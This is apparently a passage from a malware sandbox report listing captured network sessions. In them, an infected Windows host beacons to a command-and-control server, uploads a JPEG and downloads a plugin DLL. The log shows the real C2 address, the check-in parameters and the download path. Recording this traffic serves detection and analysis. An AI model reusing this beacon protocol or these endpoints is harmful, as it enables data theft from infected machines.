6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:42.578255892 CEST13336OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:42.578310013 CEST13349OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:42.578336954 CEST13359OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:42.673743010 CEST13365OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 23:00:42.673801899 CEST13376OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 23:00:42.673830986 CEST13391OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[
                                                                                                                                          Apr 28, 2021 23:00:42.673858881 CEST13399OUTData Raw: cf f6 5a f1 27 c5 0f 0e 78 47 43 26 d2 ca 49 2c f5 3b 28 55 42 cc bd 36 ff 00 c0 ab dc c3 78 93 52 a6 26 95 0c cf 01 28 39 c9 47 9b a6 a6 33 e0 ca b8 5a 15 71 39 7e 65 0a b1 a5 17 2e 5f b5 64 7f 29 5f f2 d2 bf 4a 7f e0 d5 eb 2d 33 52 ff 00 82 97
                                                                                                                                          Data Ascii: Z'xGC&I,;(UB6xR&(9G3Zq9~e._d)_J-3Rj:+u]X$0#3_wWF{~++[7/xa2nBy9$JU+e!vY}HRSg>y[wi/f=G;-!2,L$+'~k
                                                                                                                                          Apr 28, 2021 23:00:42.673976898 CEST13412OUTData Raw: ab ed 29 2b 28 a4 97 36 26 19 3c 30 b3 9b 51 73 e5 6e 3c b7 b7 37 33 8d ad 65 bc 25 cc 9f 78 47 5e 67 2b f3 55 eb 5e 1c f0 6f ec ef f0 bb e0 1e 8b f1 e3 f6 92 f0 ff 00 8e bc 4b 37 8d 7c 45 a8 e9 5e 0c f0 af 81 b5 fb 5d 18 ac 3a 72 5b b5 ed f5 d5
                                                                                                                                          Data Ascii: )+(6&<0Qsn<73e%xG^g+U^oK7|E^]:r[8b3KI<:{ KmGxB<CyOSo5}.("iQkn[@$I"}lkW<a/{h\~ :T<=}#I:
                                                                                                                                          Apr 28, 2021 23:00:42.770381927 CEST13415OUTData Raw: c5 7d 8b f1 a3 c0 9e 16 bc f8 c5 e2 cb bb 8f 8d 1e 19 b5 92 5f 13 5f bb da cf 6b aa 19 21 26 e1 c9 46 29 64 ca 58 74 3b 58 8c 8e 09 1c d7 c6 5f f0 75 15 bc 76 7f 08 7f 64 9b 4b 5b f8 ae 92 2f 0c 78 81 12 ea 00 e2 39 94 5b e8 20 3a 87 55 60 a7 a8
                                                                                                                                          Data Ascii: }__k!&F)dXt;X_uvdK[/x9[ :U`&}']Oc7z1')+x-oF]jDG7~(#$#3M9?Fw|?9'M
                                                                                                                                          Apr 28, 2021 23:00:42.770467997 CEST13431OUTData Raw: f6 ca bf 2d ff 00 e0 ba 5f b5 b7 ec ff 00 fb 65 7e d6 de 1c f8 9b fb 37 f8 f0 f8 8b 42 d3 fe 1c 59 e9 57 57 e7 4a ba b3 db 76 97 f7 f3 34 7b 2e a2 8d ce 12 78 8e e0 bb 4e ec 03 90 71 f1 55 29 fb a2 bf 42 e1 1f 08 38 6b 82 f3 85 99 60 ab 56 94 d4
                                                                                                                                          Data Ascii: -_e~7BYWWJv4{.xNqU)B8k`V\m9AH|lAE$5W_!jX&l19#9hSU/;Vap2~?>*m|@4-7U}.lHI!v|O1_l


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          583192.168.2.450100176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.555711985 CEST13333OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          584176.111.174.11480192.168.2.450100C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.655143023 CEST13360INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          585192.168.2.450101176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.875133991 CEST13546OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          586176.111.174.11480192.168.2.450099C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.966715097 CEST13546INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          587176.111.174.11480192.168.2.450101C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:42.984954119 CEST13547INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:42 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          588192.168.2.450103176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:43.193471909 CEST13547OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          589176.111.174.11480192.168.2.450103C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:43.291110039 CEST13548INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:43 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          59176.111.174.11480192.168.2.449777C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.923118114 CEST4550INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          6176.111.174.11480192.168.2.449750C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.319871902 CEST4389INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          60192.168.2.449778176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.123038054 CEST4551OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          61176.111.174.11480192.168.2.449778C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.219944954 CEST4552INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          62192.168.2.449779176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.421418905 CEST4552OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          63176.111.174.11480192.168.2.449779C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.522376060 CEST4553INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          64192.168.2.449780176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.741419077 CEST4553OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          65176.111.174.11480192.168.2.449780C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:20.848975897 CEST4554INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          66192.168.2.449781176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.066978931 CEST4554OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          67192.168.2.449782176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.123275995 CEST4555OUTGET /Hnq8vS/plugins/scr.dll HTTP/1.1
                                                                                                                                          Host: 176.111.174.114


